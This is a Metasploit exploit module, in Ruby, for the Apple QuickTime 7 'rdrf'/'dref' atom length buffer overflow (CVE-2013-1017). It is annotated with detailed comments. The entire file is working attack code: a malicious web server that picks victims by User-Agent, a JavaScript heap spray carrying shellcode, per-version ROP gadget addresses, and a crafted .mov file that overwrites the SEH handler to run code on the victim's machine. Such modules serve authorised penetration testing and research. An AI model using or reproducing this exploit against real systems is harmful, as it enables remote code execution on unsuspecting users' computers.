Path: blob/master/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser-side exploit module: runs an HTTP server (HttpServer::HTML mixin)
# that hands out a landing page and a crafted .mov file to matching clients.
# The ROP chain comes from the RopDb mixin; the per-version gadget addresses
# live in the 'Targets' table below. See 'Description' for the vulnerability.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  # Module metadata: name, description, authors, references, per-target
  # gadget addresses (Ret/Nop/Pop, all from Quicktime.qts), payload
  # constraints, default options and reliability notes.
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in Apple Quicktime. The flaw is
          triggered when Quicktime fails to properly handle the data length for certain
          atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer
          overflow by loading a specially crafted .mov file, and allows arbitrary
          code execution under the context of the current user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor
          'Tom Gallagher', # Original Discovery (overlapped)
          'Paul Bates', # Original Discovery (overlapped)
          'sinn3r' # Metasploit
        ],
        'References' => [
          [ 'CVE', '2013-1017' ],
          [ 'OSVDB', '93625' ],
          [ 'BID', '60097' ],
          [ 'URL', 'http://support.apple.com/kb/HT5770' ],
          [ 'ZDI', '13-110' ]
        ],
        'Platform' => 'win',
        'Targets' => [
          # All of the following addresses are from Quicktime.qts
          # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET
          [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', { 'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239 } ],
          [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', { 'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55 } ],
          [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', { 'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259 } ],
          [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', { 'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A } ]
        ],
        'Payload' => {
          # NUL is excluded because the JS spray helper cannot carry it
          'BadChars' => "\x00" # js_property_spray no like nilz
        },
        'DefaultOptions' => {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
        'Privileged' => false,
        'DisclosureDate' => '2013-05-22',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Builds the ROP payload from the RopDb 'msvcrt' chain, prefixed with a
  # fixed stack-adjustment stub.
  #
  # @param t [Msf::Module::Target] selected target; not consulted here, the
  #   RopDb lookup is hard-wired to 'target' => 'xp'
  # @return [String] whatever generate_rop_payload returns (presumably the
  #   chain followed by alignment + payload.encoded)
  def get_payload(t)
    alignment = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
    p = generate_rop_payload('msvcrt', alignment + payload.encoded, { 'target' => 'xp' })
    return p
  end

  # Decides whether a request gets exploit content, based solely on the
  # client-supplied User-Agent header (a best-effort filter, not a guarantee
  # that the client is actually the listed browser/version).
  #
  # @param agent [String, nil] User-Agent header value; a nil agent never
  #   matches (nil =~ regexp is nil) and falls through to false
  # @return [Boolean] true for "MSIE 8.0" on "Windows NT 5.1", or for the
  #   'contype' agent QuickTime sends when it fetches the .mov; false otherwise
  # NOTE(review): `and` is used where `&&` is conventional; since `=~` binds
  #   tighter than both, the result is the same here.
  def targetable?(agent)
    if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/
      return true
    elsif agent =~ /contype/
      # contype: a mov file request from Apple Quicktime
      return true
    end

    false
  end

  # Renders the landing page: the js_property_spray helper, the payload bytes
  # as a JS-unescapable string, a sprayHeap call, and a hidden <embed> that
  # points at a randomly named .mov under this module's resource URI.
  #
  # @param t [Msf::Module::Target] target whose arch picks the byte order for
  #   Rex::Text.to_unescape
  # @return [String] the HTML with the 4-space source indentation stripped
  def get_html(t)
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
    fake_mov_name = rand_text_alpha(4) + ".mov"
    html = %Q|
    <html>
    <head>
    <script>
    #{js_property_spray}

    var s = unescape("#{js_p}");
    sprayHeap({shellcode:s});
    </script>
    </head>
    <body>
    <embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed>
    </body>
    </html>
    |

    # The literal above is indented to match the method body; drop that indent.
    html.gsub(/^ {4}/, '')
  end

  # HTTP request handler. Clients that fail targetable? get a 404; a URI
  # ending in ".mov" gets the file prepared in #exploit (@exploit) as an
  # octet-stream; any other URI gets the landing page, marked no-cache.
  #
  # @param cli [Object] client connection passed through to send_response /
  #   send_not_found
  # @param request [Object] request object exposing #headers and #uri
  # @return [void]
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    print_status("Requesting: #{request.uri}")

    unless targetable?(agent)
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    print_status("Target selected as: #{target.name}") if target

    if request.uri =~ /\.mov$/
      print_status("Sending specially crafted .mov file")
      # @exploit is populated once, in #exploit, before the server is started
      send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })
    else
      html = get_html(target)
      send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache' })
    end
  end

  # Packs each 32-bit value big-endian and swaps its two 16-bit halves, so
  # 0xAABBCCDD becomes "\xCC\xDD\xAA\xBB"; the per-value results are joined.
  #
  # @param data [Array<Integer>] 32-bit values
  # @return [String] 4 bytes per input value
  def sort_bytes(data)
    data.map { |e| [e].pack('N').scan(/../).reverse.join }.join
  end

  # The target's 'Nop' address (a bare RET in Quicktime.qts) as 4 little-endian bytes.
  #
  # @param t [Msf::Module::Target, Hash] target providing t['Nop']
  # @return [String]
  def rop_nop(t)
    [t['Nop']].pack('V*') # Ret (QuickTime.qts)
  end

  # Builds the .mov file served by #on_request_uri, stores it in @exploit and
  # then defers to super (presumably the HttpServer mixin's server start-up).
  #
  # buf is fixed at 658 bytes: 467 filler + 10 * 4 (rop_nop) + 8 (Pop/ESP
  # pair) = 515 bytes before the first length-relative pad, then 4 bytes of
  # target.ret at offset 611, then padding to 658. The sizes in the atom
  # header comments are the authors'; the leading file-size field 0x6DF
  # (1759) equals the total length of everything appended below, buf included.
  #
  # @return [void]
  def exploit
    buf = ''
    buf << rand_text_alpha(467) # 467 to align the pivot
    10.times {
      buf << rop_nop(target)
    }
    buf << [
      target['Pop'], # POP ESP; RET (QuickTime.qts)
      0x20302020 # Target value for ESP (our ROP payload)
    ].pack('V*')
    buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler
    buf << sort_bytes([target.ret]) # ADD ESP,280; RET (QuickTime.qts) - pivot
    buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size

    # Quicktime File Format Specifications:
    # https://developer.apple.com/standards/qtff-2001.pdf
    mov = "\x00\x00\x06\xDF" # File size
    mov << "moov" # Movie atom
    mov << "\x00\x00\x06\xD7" # size (1751d)
    mov << "rmra" # Reference Movie atom
    mov << "\x00\x00\x06\xCF" # size (1743d)
    mov << "rmda" # rmda atom
    mov << "\x00\x00\x06\xBF" # size (1727d)
    mov << "rdrf" # Data reference atom
    mov << "\x00\x00\x00\x00" # size set to 0
    mov << "alis" # Data reference type: FS alias record
    mov << "\x00\x00\x06\xAA" # Size (1706d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00\x06\x61" # Size (1633d)
    mov << rand_text_alpha(38)
    mov << "\x12"
    mov << rand_text_alpha(81)
    mov << "\xFF\xFF"
    mov << rand_text_alpha(18)
    mov << "\x00\x08" # Size (8d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00"
    mov << "\x00\x08" # Size (8d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00"
    mov << "\x00\x26" # Size (38d)
    mov << rand_text_alpha(38)
    mov << "\x00\x0F\x00\x0E"
    mov << "AA" # Size (must be invalid)
    mov << rand_text_alpha(12)
    mov << "\x00\x12\x00\x21"
    mov << rand_text_alpha(36)
    mov << "\x00"
    mov << "\x0F\x33"
    mov << rand_text_alpha(17)
    mov << "\x02\xF4" # Size (756h)
    mov << rand_text_alpha(756)
    mov << "\xFF\xFF\x00\x00\x00"
    mov << buf

    @exploit = mov
    super
  end
end